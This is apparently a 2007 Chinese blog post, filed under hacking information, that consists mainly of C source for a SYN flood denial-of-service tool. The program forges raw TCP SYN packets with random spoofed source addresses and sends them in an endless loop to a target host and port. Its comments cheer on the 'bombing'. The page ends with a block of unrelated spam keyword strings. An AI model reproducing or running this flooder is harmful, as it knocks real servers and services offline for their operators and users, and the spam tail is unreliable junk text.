• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            隨筆 - 298  文章 - 377  trackbacks - 0
            <2007年10月>
            30123456
            78910111213
            14151617181920
            21222324252627
            28293031123
            45678910

            常用鏈接

            留言簿(34)

            隨筆分類

            隨筆檔案

            文章檔案

            相冊

            收藏夾

            搜索

            •  

            最新評(píng)論

            閱讀排行榜

            評(píng)論排行榜

            void send_tcp(int sockfd,struct sockaddr_in *addr);
            unsigned short check_sum(unsigned short *addr,int len);

            int main(int argc,char **argv)
            {
            int DESTPORT;
            int sockfd;
            struct sockaddr_in addr;
            struct hostent *host;
            int on=1;

            if(argc != 3)
            {
            fprintf(stderr,"Usage:dos host port.\n");
            exit(1);
            }
            DESTPORT = atoi(argv[2]);
            printf("no is attacking host %s with port %d..\n",argv[1],DESTPORT);
            //printf("ok started!\n");
            bzero(&addr,sizeof(struct sockaddr_in));
            addr.sin_family=AF_INET;
            addr.sin_port=htons(DESTPORT);

            if(inet_aton(argv[1],&addr.sin_addr)==0)
            {
            host=gethostbyname(argv[1]);
            if(host==NULL)
            {
            fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
            exit(1);
            }
            addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
            }

            /**** 使用IPPROTO_TCP創(chuàng)建一個(gè)TCP的原始套接字 ****/

            sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
            if(sockfd<0)
            {
            fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
            exit(1);
            }
            /******** 設(shè)置IP數(shù)據(jù)包格式,告訴系統(tǒng)內(nèi)核模塊IP數(shù)據(jù)包由我們自己來填寫 ***/

            setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));

            /**** 沒有辦法,只用超級(jí)護(hù)用戶才可以使用原始套接字 *********/
            setuid(getpid());

            /********* 發(fā)送炸彈了!!!! ****/
            send_tcp(sockfd,&addr);
            }

            /******* 發(fā)送炸彈的實(shí)現(xiàn) *********/
            void send_tcp(int sockfd,struct sockaddr_in *addr)
            {
            char buffer[100]; /**** 用來放置我們的數(shù)據(jù)包 ****/
            struct ip *ip;
            int i;
            struct tcphdr *tcp;
            int head_len;

            /******* 我們的數(shù)據(jù)包實(shí)際上沒有任何內(nèi)容,所以長度就是兩個(gè)結(jié)構(gòu)的長度 ***/

            head_len=sizeof(struct ip)+sizeof(struct tcphdr);

            bzero(buffer,100);

            /******** 填充IP數(shù)據(jù)包的頭部,還記得IP的頭格式嗎? ******/
            ip=(struct ip *)buffer;
            ip->ip_v=IPVERSION; /** 版本一般的是 4 **/
            ip->ip_hl=sizeof(struct ip)>>2; /** IP數(shù)據(jù)包的頭部長度 **/
            ip->ip_tos=0; /** 服務(wù)類型 **/
            ip->ip_len=htons(head_len); /** IP數(shù)據(jù)包的長度 **/
            ip->ip_id=0; /** 讓系統(tǒng)去填寫吧 **/
            ip->ip_off=0; /** 和上面一樣,省點(diǎn)時(shí)間 **/
            ip->ip_ttl=MAXTTL; /** 最長的時(shí)間 255 **/
            ip->ip_p=IPPROTO_TCP; /** 我們要發(fā)的是 TCP包 **/
            ip->ip_sum=0; /** 校驗(yàn)和讓系統(tǒng)去做 **/
            ip->ip_dst=addr->sin_addr; /** 我們攻擊的對(duì)象 **/

            /******* 開始填寫TCP數(shù)據(jù)包 *****/
            tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
            tcp->source=htons(LOCALPORT);
            tcp->dest=addr->sin_port; /** 目的端口 **/
            tcp->seq=random();
            tcp->ack_seq=0;
            tcp->doff=5;
            tcp->syn=1; /** 我要建立連接 **/
            tcp->check=0;


            /** 好了,一切都準(zhǔn)備好了.服務(wù)器,你準(zhǔn)備好了沒有?? ^_^ **/
            while(1)
            {
            /** 你不知道我是從那里來的,慢慢的去等吧! **/
            ip->ip_src.s_addr=random();

            /** 什么都讓系統(tǒng)做了,也沒有多大的意思,還是讓我們自己來校驗(yàn)頭部吧 */
            /** 下面這條可有可無 */
            tcp->check=check_sum((unsigned short *)tcp,
            sizeof(struct tcphdr));
            sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
            }
            }

            /* 下面是首部校驗(yàn)和的算法,偷了別人的 */
            unsigned short check_sum(unsigned short *addr,int len)
            {
            register int nleft=len;
            register int sum=0;
            register short *w=addr;
            short answer=0;

            while(nleft>1)
            {
            sum+=*w++;
            nleft-=2;
            }
            if(nleft==1)
            {
            *(unsigned char *)(&answer)=*(unsigned char *)w;
            sum+=answer;
            }

            sum=(sum>>16)+(sum&0xffff);
            sum+=(sum>>16);
            answer=~sum;
            return(answer);
            }
            posted on 2007-08-17 12:17 聶文龍 閱讀(1159) 評(píng)論(0)  編輯 收藏 引用 所屬分類: some hack imformation
            99热精品久久只有精品| 99热精品久久只有精品| 97久久精品人妻人人搡人人玩| 99久久国产宗和精品1上映| 久久国产欧美日韩精品免费| 欧美久久精品一级c片片| 狠狠色综合网站久久久久久久 | 久久久久久久波多野结衣高潮| 2021国内久久精品| 国产精品久久久久久吹潮| 久久国产成人午夜AV影院| 国产精品久久新婚兰兰| 九九久久99综合一区二区| 久久精品国产男包| 国产999精品久久久久久| 久久久久99精品成人片试看| 久久强奷乱码老熟女| 狠狠色丁香婷婷综合久久来| 国产偷久久久精品专区| 尹人香蕉久久99天天拍| 99久久国产热无码精品免费久久久久 | 伊人久久大香线蕉av不卡 | 精品久久一区二区| 亚洲午夜久久久影院| 亚洲精品国产综合久久一线| 国产精品九九久久免费视频| 欧美亚洲国产精品久久蜜芽| 国产成人精品免费久久久久| 色婷婷综合久久久久中文| 亚洲欧美日韩中文久久| 亚洲国产精品无码久久久不卡 | 久久国产精品99精品国产| 婷婷久久久亚洲欧洲日产国码AV| 久久久久久精品久久久久| 久久亚洲熟女cc98cm| 久久久久久久精品成人热色戒 | 久久天堂AV综合合色蜜桃网| 久久无码人妻一区二区三区午夜| 精品久久8x国产免费观看| 国产成人精品久久二区二区| 99久久伊人精品综合观看|